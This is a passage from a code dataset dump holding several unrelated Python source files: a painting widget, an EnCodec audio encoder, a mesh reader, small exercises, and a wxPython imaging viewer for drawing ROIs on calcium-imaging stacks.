n_list[k]=n_list[k-1]+n_list[k-m]\n# n_list[k]%=1000000007\n# print(n_list[-1])\n\n# n,k = map(int,(input().split()))\n# total = [0]*(n+1)\n# for i in range(1,min(k+1,n+1)):\n# if i != k:\n# total[i]=1\n# else:\n# total[i]=2\n\n# for i in range(k+1,n+1):\n# if i >k:\n# total[i]=total[i-1]+total[i-k]\n \n# total[i]%=1000000007\n\n \n \n# print(total[-1])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2023/5월/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70021009768","text":"\nclass LogicPreps:\n\n def __init__(self):\n self.ext_fa = \".fa\"\n self.ext_dat = \".dat\"\n self.ext_gtf = \".gtf\"\n self.strt_NM_ = \"NM_\"\n\n def sort_list_by_ele(self, data_list, ele_idx, up_down_flag=True):\n result_list = []\n for tmp_arr in sorted(data_list, key=lambda tmp_arr: tmp_arr[ele_idx], reverse=up_down_flag):\n result_list.append(tmp_arr)\n return result_list\n\n def make_list_to_dict_by_ele_as_key(self, dfam_list, ele_key):\n result_dict = {}\n for dfam_arr in dfam_list:\n tmp_key = dfam_arr[ele_key]\n if tmp_key in result_dict:\n result_dict[tmp_key].append(dfam_arr)\n else:\n result_dict.update({tmp_key: [dfam_arr]})\n return result_dict\n\n def merge_multi_list(self, pool_list):\n result_list = []\n for split_list in pool_list:\n result_list.extend(split_list)\n return result_list\n","repo_name":"astroboi-SH-KWON/TE_targeting_DNA_clock","sub_path":"LogicPrep.py","file_name":"LogicPrep.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33368913322","text":"import sys\nimport random\nfrom pathlib import Path\nfrom functools import partial\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass PaintingApplication(QtWidgets.QWidget):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.brushSize = 1 # The initial brush size\n self.spray_size = 100 # The area occupied by one spray\n self.lastPoint = QtCore.QPoint() # The coordinates of where the last event occurred\n self.statusBar_event = QtCore.pyqtSignal()\n self.titleBar_event = QtCore.pyqtSignal()\n\n # Image canvas\n self.filePath = ''\n self.drawing = False\n self.saved = False\n self.image = QtGui.QImage(self.size(), QtGui.QImage.Format_RGB32)\n self.image.fill(QtCore.Qt.white)\n\n # Default brush values\n self.brushColor = QtCore.Qt.black\n self.penStyle = QtCore.Qt.SolidLine\n self.capStyle = QtCore.Qt.RoundCap\n self.joinStyle = QtCore.Qt.RoundJoin\n\n # Initial events handler\n self.mouseMoveEvent = self.pen_mouseMoveEvent\n\n # A custom method based on the save method\n self.saveAs = partial(self.save, save_as=True)\n\n def set_event_outlet(self, status_bar, title_bar):\n \"\"\" This sets where the signals are been sent to \"\"\"\n self.statusBar_event = status_bar\n self.titleBar_event = title_bar\n\n def mousePressEvent(self, event):\n if event.button() == QtCore.Qt.LeftButton:\n self.drawing = True\n self.lastPoint = event.pos()\n\n def mouseReleaseEvent(self, event):\n if event.button == QtCore.Qt.LeftButton:\n self.drawing = False\n\n def paintEvent(self, event):\n canvas_painter = QtGui.QPainter(self)\n canvas_painter.drawImage(self.rect(), self.image, self.image.rect())\n\n def resizeEvent(self, event: QtGui.QMouseEvent):\n \"\"\" When the window size has changed you scale the image \"\"\"\n self.image = self.image.scaled(self.width(), self.height())\n\n def save(self, save_as=False):\n if save_as:\n self.saved = False\n if not self.saved:\n file_path, _ = QtWidgets.QFileDialog.getSaveFileName(\n self, \"Save Image\", \"\",\n \"PNG(*.png);;JPG(*.jpg *.jpeg);;All Files (*.*)\")\n # If the user exited the dialog\n if file_path == \"\":\n self.statusBar_event.emit('No file path provided')\n # Here it will just return to the app\n return\n self.saved = True\n self.filePath = file_path\n else:\n file_path = self.filePath\n self.image.save(file_path)\n\n # Get just the name of the file\n path = Path(file_path)\n file_path, _ = path.name.split('.')\n\n # Update both the status and title bar\n self.statusBar_event.emit('File Saved')\n self.titleBar_event.emit(f'{file_path} project')\n\n def clear(self):\n \"\"\" Fill the canvas with white color \"\"\"\n self.image.fill(QtCore.Qt.white)\n self.update()\n\n def open(self):\n file_path, _ = QtWidgets.QFileDialog.getOpenFileName(\n self, \"Open Image\", \"\",\n \"PNG(*.png);;JPG(*.jpg *.jpeg);;All Files (*.*)\")\n # If the user exited the dialog\n if file_path == \"\":\n return\n with open(file_path, 'rb') as f:\n content = f.read()\n # Load the image data from the BytesIO buffer\n self.image.loadFromData(content)\n width = self.width()\n height = self.height()\n self.image = self.image.scaled(width, height)\n self.update()\n\n # All the brushes Handlers\n def pen_mouseMoveEvent(self, event):\n \"\"\" Check if the button clicked was the left one \"\"\"\n if event.buttons() & QtCore.Qt.LeftButton & self.drawing:\n painter = QtGui.QPainter(self.image)\n painter.setPen(QtGui.QPen(self.brushColor, self.brushSize,\n self.penStyle, self.capStyle, self.joinStyle))\n painter.drawLine(self.lastPoint, event.pos())\n self.lastPoint = event.pos()\n self.update()\n\n def spray_mouseMoveEvent(self, e):\n \"\"\" This puts dots at random point within the specified radius \"\"\"\n painter = QtGui.QPainter(self.image)\n p = painter.pen()\n p.setWidth(1)\n p.setColor(self.brushColor)\n painter.setPen(p)\n for _ in range(self.spray_size):\n xo = random.gauss(0, self.brushSize)\n yo = random.gauss(0, self.brushSize)\n painter.drawPoint(e.x() + xo, e.y() + yo)\n self.update()\n\n def eraser_mouseMoveEvent(self, e):\n \"\"\" This is pen brush using the square cap \"\"\"\n painter = QtGui.QPainter(self.image)\n p = painter.pen()\n p.setWidth(self.brushSize)\n p.setColor(QtCore.Qt.white)\n painter.setPen(p)\n p.setCapStyle(QtCore.Qt.SquareCap)\n painter.drawPoint(e.x(), e.y())\n self.update()\n\n\n# This is available for debugging\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n window = PaintingApplication()\n window.show()\n app.exec()\n","repo_name":"yungwarlock/PaintApp","sub_path":"widgets/canvas.py","file_name":"canvas.py","file_ext":"py","file_size_in_byte":5325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71229919848","text":"import json\n\n\nclass Person:\n def __init__(self, price, name):\n self.price = price\n self.name = name\n\n # set de reguli, format de serializare a datelor - json(java script object notation)\n# person =Person(\"ionescu\", 2000) - > serializat -> String(format json) -> transmise prin internet, fisiere, hard extern -> obiecte(deserializare)\n\nthisdict = [\n { \"brand\": \"Ford\",\n \"model\": \"Mustang\",\n \"year\": 1964},\n\n {\"brand\": \"Ford\",\n \"model\": \"Mustang\",\n \"year\": 1964}\n]\n\nprint(thisdict)\n\n# convert into JSON:\ny = json.dumps(thisdict)\nprint(\"Serializarea:{}\".format(y))\n\n# scriere date intru fisier, dupa serializarea\nf = open(\"demofile2.txt\", \"a\")\nf.write(y)\nf.close()\n\n# parse x:\nx = json.loads(y)\nprint(\"Deserializarea:{}\".format(x))","repo_name":"lauracarpaciu/Algorithmic_Thinking","sub_path":"Siruri de caractere/Reprezentarea binara.py","file_name":"Reprezentarea binara.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72056782569","text":"from triangle import *\nfrom vertex import *\n\n\nclass Reader:\n def __init__(self, file):\n file = open(file, \"r\")\n\n nb_of_vertices = int(file.readline())\n self.vertices = []\n\n for i in range(0, nb_of_vertices):\n vertex = Vertex(list(map(float, file.readline().split())))\n self.vertices.append(vertex)\n\n Triangle.index = len(self.vertices) + 3\n\n nb_of_triangles = int(file.readline())\n self.triangles = []\n\n for j in range(0, nb_of_triangles):\n indices = list(map(int, file.readline().split()))\n self.triangles.append(\n Triangle(self.vertices[indices[0]], self.vertices[indices[1]], self.vertices[indices[2]]))\n\n def __str__(self):\n string = \"Vertices (\" + str(len(self.vertices)) + \")\\n\"\n for vertex in self.vertices:\n string += str(vertex) + \"\\n\"\n\n string += \"\\nTriangles (\" + str(len(self.triangles)) + \")\\n\"\n for triangle in self.triangles:\n string += str(triangle) + \"\\n\"\n return string\n\n def serialize(self):\n string = \"Vertices\\n\"\n for vertex in self.vertices:\n string += vertex.serialize_w_index() + \"\\n\"\n string += \"\\nTriangles\\n\"\n for triangle in self.triangles:\n string += triangle.serialize() + \"\\n\"\n return string\n","repo_name":"cpeelman/3dcg","sub_path":"mesh/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73143675368","text":"# Copyright (c) Meta Platforms, Inc. and affiliates.\r\n# All rights reserved.\r\n#\r\n# This source code is licensed under the license found in the\r\n# LICENSE file in the root directory of this source tree.\r\n\r\n\"\"\"EnCodec model implementation.\"\"\"\r\n\r\nimport math\r\nimport typing as tp\r\nfrom pathlib import Path\r\n\r\nimport numpy as np\r\nimport torch\r\nfrom torch import nn\r\n\r\nfrom . import SEANetEncoder\r\n\r\nEncodedFrame = tp.Tuple[torch.Tensor, tp.Optional[torch.Tensor]]\r\n\r\n\r\nclass EncodecEncoder(nn.Module):\r\n \"\"\"EnCodec model operating on the raw waveform.\r\n Args:\r\n encoder (nn.Module): Encoder network.\r\n sample_rate (int): Audio sample rate.\r\n channels (int): Number of audio channels.\r\n normalize (bool): Whether to apply audio normalization.\r\n segment (float or None): segment duration in sec. when doing overlap-add.\r\n Pass `None` to use the full input duration as segment.\r\n overlap (float): overlap between segment, given as a fraction of the segment duration.\r\n name (str): name of the model, used as metadata when compressing audio.\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n encoder: SEANetEncoder,\r\n sample_rate: int,\r\n channels: int,\r\n normalize: bool = False,\r\n segment: tp.Optional[float] = None,\r\n overlap: float = 0.01,\r\n name: str = \"unset\",\r\n ):\r\n super().__init__()\r\n self.encoder = encoder\r\n self.sample_rate = sample_rate\r\n self.channels = channels\r\n self.normalize = normalize\r\n self.segment = segment\r\n self.overlap = overlap\r\n self.frame_rate = math.ceil(self.sample_rate / np.prod(self.encoder.ratios))\r\n self.name = name\r\n\r\n @property\r\n def segment_length(self) -> tp.Optional[int]:\r\n if self.segment is None:\r\n return None\r\n return int(self.segment * self.sample_rate)\r\n\r\n @property\r\n def segment_stride(self) -> tp.Optional[int]:\r\n segment_length = self.segment_length\r\n if segment_length is None:\r\n return None\r\n return max(1, int((1 - self.overlap) * segment_length))\r\n\r\n @property\r\n def output_shape_per_segment(self) -> tuple[int, int]:\r\n return (self.encoder.dimension, self.frame_rate * self.segment)\r\n\r\n def encode(self, x: torch.Tensor) -> tp.List[EncodedFrame]:\r\n \"\"\"Given a tensor `x`, returns a list of frames containing\r\n the embeddings for `x`, along with rescaling factors\r\n for each segment, when `self.normalize` is True.\r\n \"\"\"\r\n assert x.dim() == 3\r\n _, channels, length = x.shape\r\n assert channels > 0 and channels <= 2\r\n segment_length = self.segment_length\r\n if segment_length is None:\r\n segment_length = length\r\n stride = length\r\n else:\r\n stride = self.segment_stride # type: ignore\r\n assert stride is not None\r\n\r\n encoded_frames: tp.List[EncodedFrame] = []\r\n for offset in range(0, length, stride):\r\n frame = x[:, :, offset : offset + segment_length]\r\n encoded_frames.append(self._encode_frame(frame))\r\n return encoded_frames\r\n\r\n def _encode_frame(self, x: torch.Tensor) -> EncodedFrame:\r\n length = x.shape[-1]\r\n duration = length / self.sample_rate\r\n assert self.segment is None or duration <= 1e-5 + self.segment\r\n\r\n if self.normalize:\r\n mono = x.mean(dim=1, keepdim=True)\r\n volume = mono.pow(2).mean(dim=2, keepdim=True).sqrt()\r\n scale = 1e-8 + volume\r\n x = x / scale\r\n scale = scale.view(-1, 1)\r\n else:\r\n scale = None\r\n\r\n emb = self.encoder(x)\r\n return emb\r\n\r\n def forward(self, x: torch.Tensor) -> torch.Tensor:\r\n frames = self.encode(x)\r\n return frames\r\n\r\n @staticmethod\r\n def encodec_model_48khz(\r\n pretrained: bool = True,\r\n repository: tp.Optional[tp.Union[Path, str]] = None,\r\n segment: float = 1.0,\r\n overlap: float = 0.01,\r\n ):\r\n \"\"\"Return the pretrained 48khz model.\"\"\"\r\n if repository:\r\n assert pretrained\r\n repository = Path(repository) if isinstance(repository, str) else repository\r\n checkpoint_name = \"encodec_encoder_48khz.pt\"\r\n sample_rate = 48_000\r\n channels = 2\r\n causal = False\r\n model_norm = \"time_group_norm\"\r\n audio_normalize = True\r\n name = \"encodec_48khz\" if pretrained else \"unset\"\r\n\r\n encoder = SEANetEncoder(channels=channels, norm=model_norm, causal=causal)\r\n\r\n model = EncodecEncoder(\r\n encoder=encoder,\r\n sample_rate=sample_rate,\r\n channels=channels,\r\n normalize=audio_normalize,\r\n segment=segment,\r\n overlap=overlap,\r\n name=name,\r\n )\r\n if pretrained:\r\n if not repository.is_dir():\r\n raise ValueError(f\"{repository} must exist and be a directory.\")\r\n state_dict = torch.load(repository / checkpoint_name)\r\n model.load_state_dict(state_dict)\r\n model.eval()\r\n return model\r\n\r\n @staticmethod\r\n def encodec_model_24khz(\r\n pretrained: bool = True,\r\n repository: tp.Optional[tp.Union[Path, str]] = None,\r\n segment: float = None,\r\n overlap: float = 0.01,\r\n ):\r\n \"\"\"Return the pretrained 24khz model.\"\"\"\r\n if repository:\r\n assert pretrained\r\n repository = Path(repository) if isinstance(repository, str) else repository\r\n checkpoint_name = \"encodec_encoder_24khz.pt\"\r\n sample_rate = 24_000\r\n channels = 1\r\n causal = True\r\n model_norm = \"weight_norm\"\r\n audio_normalize = False\r\n name = \"encodec_24khz\" if pretrained else \"unset\"\r\n\r\n encoder = SEANetEncoder(channels=channels, norm=model_norm, causal=causal)\r\n\r\n model = EncodecEncoder(\r\n encoder=encoder,\r\n sample_rate=sample_rate,\r\n channels=channels,\r\n normalize=audio_normalize,\r\n segment=segment,\r\n overlap=overlap,\r\n name=name,\r\n )\r\n if pretrained:\r\n if not repository.is_dir():\r\n raise ValueError(f\"{repository} must exist and be a directory.\")\r\n state_dict = torch.load(repository / checkpoint_name)\r\n model.load_state_dict(state_dict)\r\n model.eval()\r\n return model\r\n","repo_name":"pcmbs/preset-embedding_audio-model-selection","sub_path":"src/models/encodec/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4811978292","text":"\nwhile True :\n\ttry:\n\t\tW = float(input(\"What is your weight in pound:\"))\n\t\tr = input(\"What is your gender? 'female' or 'male':\").lower()\n\t\tA = float(input(\"The amount of alcohol by volume of the drinks consumed in ounces:\"))\n\t\tH = float(input(\"The number of hour since last drink:\"))\n\t\tbreak\n\texcept ValueError:\n\t\tprint(\"Try again\")\n\n\nif r == 'female' or r == 'f':\n\tr = 0.66\nelse:\n\tr = 0.73\n\nBAC= round(((A * 5.14)/(W/r))- (0.15*H),2)\n\nif BAC >=0.08:\n\tprint(f\"Your BAC is {BAC},It is not legal for you to drive\")\nelse:\n\tpring(f\"Your BAC is {BAC},You can drive, but stay safe\")\n","repo_name":"Ruchiya/57ExercisesForProgrammer","sub_path":"17_Blood_Alcohol_Calculator.py","file_name":"17_Blood_Alcohol_Calculator.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26007776744","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport matplotlib\nmatplotlib.use('WXAgg')\nimport scipy.io as so\nimport wx\nimport h5py\nimport os\nimport re\nimport numpy as np\nfrom roipoly import roipoly\nfrom sleepy import get_snr, load_stateidx #added this line to test plotting stateidx\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_wxagg import \\\n FigureCanvasWxAgg as FigCanvas, \\\n NavigationToolbar2WxAgg as NvigationToolbar\nfrom Utility import *\nfrom imaging import *\n# to test whehter point lies within polygon\nfrom shapely.geometry import Point\nfrom shapely.geometry.polygon import Polygon\n\n# new imports \nimport imaging as img\nimport Utility as ut\nimport matplotlib.pylab as plt\n\n### Debugger\nimport pdb\n\n\n\n# for a wxpython gui you\n# need to inherit the class wx.Frame\nclass ImageViewer(wx.Frame) :\n\n def __init__(self, ipath):\n wx.Frame.__init__(self, None, -1, \"\", size=(600,100), pos=(100,100))\n\n # folders\n self.ipath = ipath\n self.name = \"\"\n\n # roi management\n self.proi_mode = False\n self.pcollect_roi = False\n self.proi_delete = False\n self.pdisk = False\n self.curr_roi_x = []\n self.curr_roi_y = []\n self.roi_id = 1\n self.roi_name = ''\n self.cmap = np.zeros((1,3))\n # shape: [(xcoords, ycoords),...]\n self.ROIs = []\n self.ROI_coords = []\n\n self.dpi = 100\n self.icursor = 0\n self.dt = 20\n self.sr = -1\n # recording contains spectrogram\n self.sp_exists = True\n #self.pcorr_stack = True\n self.file_type = '_aligned.hdf5'\n self.create_menu()\n\n\n def setup_imaging(self) :\n # load spectrum\n if os.path.isfile(os.path.join(self.ipath, self.name, 'sp_' + self.name + '.mat')):\n P = so.loadmat(os.path.join(self.ipath, self.name, 'sp_' + self.name + '.mat'))\n self.SP = P['SP']\n self.freq = P['freq']\n self.stime = P['t'][0]\n self.sdt = self.stime[1]-self.stime[0]\n self.sp_exists = True\n\n # read image stack\n if os.path.isfile(os.path.join(self.ipath, self.name, 'recording_' + self.name + '_aligned.hdf5')):\n fid = h5py.File(os.path.join(self.ipath, self.name, 'recording_' + self.name + '_aligned.hdf5'))\n print(\"loaded motion corrected file (*_aligned.hdf5)\")\n else:\n self.file_type = '_downsampcorr.hdf5'\n fid = h5py.File(os.path.join(self.ipath, self.name, 'recording_' + self.name + self.file_type))\n\n self.stack = fid['images']\n self.nframes = self.stack.shape[0]\n\n\n # read mean of disk filtered stack\n if os.path.isfile(os.path.join(self.ipath, self.name, 'recording_' + self.name + '_actmap.mat')):\n self.disk_img = so.loadmat(os.path.join(self.ipath, self.name, 'recording_' + self.name + '_actmap.mat'))['mean']\n else:\n self.disk_img = self.stack[0,:,:]\n\n # read brain states\n # test if sleep state file exists\n if os.path.isfile(os.path.join(self.ipath, self.name, 'remidx_' + self.name + '.txt')): #added remidx'z' on the string to remove this dependence\n tmp = load_stateidx(self.ipath, self.name)\n else:\n tmp = np.zeros((0,))\n self.M = np.zeros((1, tmp.shape[0]))\n self.M[0,:] = tmp\n\n # get colorrange minimum and maximum values\n tmp = self.stack[1000:1500,20:-20,20:-20]\n self.cmin = tmp.min()\n self.cmax = tmp.max()\n\n self.panel = wx.Panel(self)\n self.Bind(wx.EVT_CHAR_HOOK, self.on_key_down)\n\n # call functions\n self.create_image_axes()\n # called each time something is supposed to change on the figure\n self.draw_figure() \n\n\n \n def create_menu(self) :\n \"\"\"\n create menu allowing the user to select an imaging folder\n \"\"\"\n self.menubar = wx.MenuBar()\n \n menu_file = wx.Menu()\n m_expt = menu_file.Append(-1, \"&Open Folder\\tCtrl-o\", \"open imaging folder\")\n self.Bind(wx.EVT_MENU, self.on_open, m_expt)\n menu_file.AppendSeparator()\n m_exit = menu_file.Append(-1, \"&Exit\\tCtrl-X\", \"Exit\")\n self.Bind(wx.EVT_MENU, self.on_exit, m_exit)\n \n menu_help = wx.Menu()\n m_about = menu_help.Append(-1, \"&About\\tF1\", \"Help\")\n #self.Bind(wx.EVT_MENU, self.on_about, m_about)\n\n # Menu for ROI processing\n menu_roi = wx.Menu()\n # Extract ROIs\n m_extract = menu_roi.Append(-1, \"&Extract ROI\\tF2\", \"ROI\")\n self.Bind(wx.EVT_MENU, self.on_extract, m_extract)\n # Plot ROIs\n m_plot = menu_roi.Append(-1, \"&Plot ROI\\tF3\", \"Plot\")\n self.Bind(wx.EVT_MENU, self.on_plot, m_plot)\n \n \n self.menubar.Append(menu_file, \"&File\")\n self.menubar.Append(menu_help, \"&Help\")\n self.menubar.Append(menu_roi, \"&ROI Processing\")\n self.SetMenuBar(self.menubar)\n\n \n def create_image_axes(self) :\n \"\"\"\n draw all the elements on the figure\n \"\"\"\n\n self.fig = Figure((5.0, 5.0), facecolor='white', dpi=100)\n self.canvas = FigCanvas(self.panel, -1, self.fig)\n self.axes = self.fig.add_axes([0.05, 0.28, 0.9, 0.72])\n\n if self.sp_exists:\n img_time = img.imaging_timing(self.ipath, self.name)\n # python 2:\n #closest_time = lambda(it, st) : np.argmin(np.abs(it-st))\n # python 3:\n def closest_time(it, st):\n return np.argmin(np.abs(it-st))\n\n nf = np.min((self.nframes, img_time.shape[0]))\n try:\n last_state = closest_time(img_time[nf-1], self.stime)\n except:\n #HERE just some hack 10/6/17\n last_state = self.M.shape[1]\n self.sr = 1.0 / np.mean(np.diff(img_time))\n\n # axes for EEG spectrogram\n if self.sp_exists:\n self.axes_eeg = self.fig.add_axes([0.05, 0.13, 0.9, 0.14])\n SP = self.SP[0:31,0:last_state+1]\n SP = np.flipud(SP)\n tmp = self.axes_eeg.imshow(SP)\n tmp.set_clim((SP.min(), np.median(SP[:])*20))\n self.axes_eeg.axis('tight')\n self.axes_eeg.set_xticks([])\n self.axes_eeg.set_yticks([29, 19, 9])\n self.axes_eeg.yaxis.set_label_position(\"right\")\n self.axes_eeg.set_yticklabels([0, 10, 20], fontsize=9)\n self.axes_eeg.set_ylabel('Freq (Hz)', fontsize=9)\n\n\n # show brain state\n if self.sp_exists:\n self.axes2 = self.fig.add_axes([0.05, 0.08, 0.9, 0.04])\n cmap = plt.cm.jet\n my_map = cmap.from_list('ha', [[0,1,1],[1,0,1], [0.8, 0.8, 0.8]], 3)\n tmp = self.axes2.imshow(self.M)\n tmp.set_cmap(my_map)\n self.axes2.axis('tight')\n tmp.axes.get_xaxis().set_visible(False)\n tmp.axes.get_yaxis().set_visible(False)\n \n # time point tick\n self.axes3 = self.fig.add_axes([0.05, 0.08, 0.9, 0.02])\n self.axes3.set_xticks(np.arange(0, self.nframes, self.sr*600))\n labels = np.arange(0, (self.nframes/(self.sr*60.0)), 10)\n self.axes3.set_xticklabels(labels)\n\n #tmp.axes.get_xaxis().set_visible(False)\n self.axes3.get_yaxis().set_visible(False)\n\n\n ### Create slider to choose image frame\n self.slider_label = wx.StaticText(self.panel, -1, \n \"Bar width (%): \")\n self.slider_width = wx.Slider(self.panel, -1, size=(200,-1),\n value=0, \n minValue=0,\n maxValue=self.nframes-1,\n style=wx.SL_AUTOTICKS | wx.SL_LABELS)\n self.slider_width.SetTickFreq(10) ## changed this (only accepts 1 arg in the new version of wx)\n self.Bind(wx.EVT_COMMAND_SCROLL_THUMBTRACK, self.on_slider_width, self.slider_width)\n\n\n ### create text box to set dt\n self.set_dt = wx.StaticText(self.panel, -1, \"dt [s]\")\n self.textbox = wx.TextCtrl(\n self.panel, \n size=(50,-1),\n style=wx.TE_PROCESS_ENTER)\n self.Bind(wx.EVT_TEXT_ENTER, self.on_text_enter, self.textbox)\n\n #########################################################\n ### ROI management widgets ##############################\n #########################################################\n\n ### text label saying ROI\n self.roi_text = wx.StaticText(self.panel, -1, \"ROIs\")\n\n \n ### create check box asking for ROI mode\n self.roi_check = wx.CheckBox(self.panel, -1, \n \"Show ROIs\",\n style=wx.ALIGN_RIGHT)\n self.Bind(wx.EVT_CHECKBOX, self.on_roi_check, self.roi_check)\n\n\n\n ### check box asking for disk image\n self.disk_check = wx.CheckBox(self.panel, -1, \n \"Show Disk\",\n style=wx.ALIGN_RIGHT)\n self.Bind(wx.EVT_CHECKBOX, self.on_disk_check, self.disk_check)\n\n ### create NEW Button\n self.button_new = wx.Button(self.panel, -1, \"NEW\")\n self.Bind(wx.EVT_BUTTON, self.on_button_new, self.button_new)\n\n ### create LOAD Button\n self.button_load = wx.Button(self.panel, -1, \"LOAD\")\n self.Bind(wx.EVT_BUTTON, self.on_button_load, self.button_load)\n \n ### create SAVE Button\n self.button_save = wx.Button(self.panel, -1, \"SAVE\")\n self.Bind(wx.EVT_BUTTON, self.on_button_save, self.button_save)\n\n ### somehow position all these widgets\n self.vbox = wx.BoxSizer(wx.VERTICAL)\n self.vbox.Add(self.canvas, 1, wx.LEFT | wx.TOP | wx.GROW)\n #self.vbox.Add(self.toolbar, 0, wx.EXPAND)\n #self.vbox.AddSpacer(10)\n\n\n \n #flags = wx.ALIGN_CENTER | wx.EXPAND | wx.ALIGN_CENTER_VERTICAL\n #self.hbox.Add(self.cb_grid, 0, border=3, flag=flags)\n #self.hbox.AddSpacer(0)\n #self.hbox.Add(self.slider_label, 0, flag=flags)\n #self.hbox.Add(self.slider_width, 0, border=3, flag=wx.EXPAND)\n\n self.bhox_slider = wx.BoxSizer(wx.HORIZONTAL)\n self.bhox_slider.AddSpacer(25)\n self.bhox_slider.Add(self.slider_width, 1, border=0, flag=wx.TOP | wx.EXPAND | wx.ALIGN_CENTER)\n self.bhox_slider.AddSpacer(25)\n self.vbox.Add(self.bhox_slider, 0, border=0, flag = wx.ALIGN_CENTER | wx.EXPAND)\n #self.vbox.Add(self.slider_width, 0, border=0, flag = wx.BOTTOM | wx.ALIGN_CENTER | wx.EXPAND)\n \n # horizontal box for time setp\n self.hbox = wx.BoxSizer(wx.HORIZONTAL)\n self.hbox.Add(self.set_dt, 0, border=3, flag=wx.TOP | wx.LEFT)\n self.hbox.Add(self.textbox, 0, border=3, flag=wx.TOP | wx.LEFT)\n self.vbox.Add(self.hbox, 0, flag = wx.BOTTOM | wx.ALIGN_CENTER | wx.EXPAND)\n\n\n ### horizontal box for ROI management\n self.hbox_roi = wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_roi.Add(self.roi_text, 0, border=3, flag=wx.TOP | wx.LEFT)\n self.hbox_roi.Add(self.button_new, 0, border=3, flag=wx.TOP | wx.LEFT)\n self.hbox_roi.Add(self.button_load, 0, border=3, flag=wx.TOP | wx.LEFT)\n self.hbox_roi.Add(self.button_save, 0, border=3, flag=wx.TOP | wx.LEFT)\n self.hbox_roi.Add(self.roi_check, 0, border=3, flag=wx.TOP | wx.LEFT)\n self.hbox_roi.Add(self.disk_check, 0, border=3, flag=wx.TOP | wx.LEFT)\n # finally add to big vertical box\n self.vbox.Add(self.hbox_roi, 0, flag = wx.BOTTOM | wx.ALIGN_CENTER | wx.EXPAND)\n\n\n self.panel.SetSizer(self.vbox)\n self.vbox.Fit(self)\n\n self.axes.figure.canvas.mpl_connect('button_press_event', self.on_pick)\n\n\n def draw_figure(self):\n \n # plot current imaging frame\n self.axes.clear()\n if self.pdisk == True and self.proi_mode == True:\n img = self.axes.imshow(self.disk_img)\n else:\n img = self.axes.imshow(self.stack[self.icursor,:,:])\n img.set_clim((self.cmin, self.cmax))\n img.set_cmap('gray')\n # No x and y tick labels:\n img.axes.get_xaxis().set_visible(False)\n img.axes.get_yaxis().set_visible(False)\n self.axes.axis('tight')\n\n # show current time point\n self.axes3.clear()\n self.axes3.plot(self.icursor, 0, 'r^')\n self.axes3.set_xlim([0, self.nframes])\n self.axes3.set_xticks(np.arange(0, self.nframes, self.sr*600))\n labels = np.arange(0, (self.nframes/(self.sr*60.0)), 10)\n self.axes3.set_xticklabels(labels, fontsize=9)\n self.axes3.set_xlabel('Time (min)', fontsize=9)\n\n # draw ROIs\n if self.proi_mode == True :\n self.draw_rois()\n if self.pcollect_roi == True :\n self.draw_current_roi()\n self.canvas.draw() \n\n \n ### draw ROIs\n def draw_rois(self) :\n i=0\n for (x,y) in self.ROIs :\n # NOTE: x and y coordinates are exchanged!!\n # imshow and Line2D assume different coordinate arrangements!!\n l = plt.Line2D(y+[y[0]], x+[x[0]], color=self.cmap[i,:])\n self.axes.text(np.max(y)-5, np.min(x)+7, str(i), fontsize=10, color=self.cmap[i,:],bbox=dict(facecolor='w', alpha=0.))\n self.axes.add_line(l)\n i = i+1\n \n\n def draw_current_roi(self) :\n # NOTE: x and y exchanged!\n l = plt.Line2D(self.curr_roi_y, self.curr_roi_x, color='r', marker='.')\n self.axes.add_line(l)\n \n\n ### CALLBACKS\n def on_slider_width(self, event):\n self.icursor = self.slider_width.GetValue()\n self.draw_figure()\n event.Skip()\n\n def on_key_down(self, event):\n keycode = event.GetKeyCode()\n #print keycode\n #cursor to the right\n if keycode == 316 :\n self.icursor = self.icursor+self.dt\n self.slider_width.SetValue(self.icursor)\n self.draw_figure()\n #cursor to the left\n if keycode == 314 :\n if self.icursor >= self.dt:\n self.icursor = self.icursor - self.dt\n self.slider_width.SetValue(self.icursor)\n self.draw_figure()\n\n # 'a' pressed: start drawing new roi\n if keycode == 65 :\n if self.proi_mode == True :\n self.pcollect_roi = True\n\n # 'c' pressed: stop drawing the current roi\n if keycode == 67 :\n if self.proi_mode == True :\n self.pcollect_roi = False\n self.curr_roi_x = []\n self.curr_roi_y = []\n self.draw_figure()\n\n # 'r' pressed: register current roi\n if keycode == 82 :\n if self.proi_mode == True and self.pcollect_roi == True :\n self.ROIs.append((self.curr_roi_x[:], self.curr_roi_y[:]))\n self.curr_roi_x = []\n self.curr_roi_y = []\n self.pcollect_roi = False\n self.set_cmap()\n self.draw_figure()\n\n # 'd' pressed: delete roi\n if keycode == 68 :\n # test for each roi if the mouse is within it, if so, delete this roi\n # now we are in roi delete mode\n self.proi_delete = True\n\n event.Skip()\n \n\n def on_text_enter(self, event) :\n self.dt = int( float(self.textbox.GetValue()) / (1.0 / self.sr) )\n #print \"dt %d\" % self.dt\n\n\n # left mouse button was pressed:\n def on_pick(self, event) :\n \"\"\"\n mouse has been clicked on the canvas\n \"\"\"\n box_points = (event.xdata, event.ydata)\n #print \"coords:\"\n #print box_points\n #print self.axes.get_xlim()\n #print 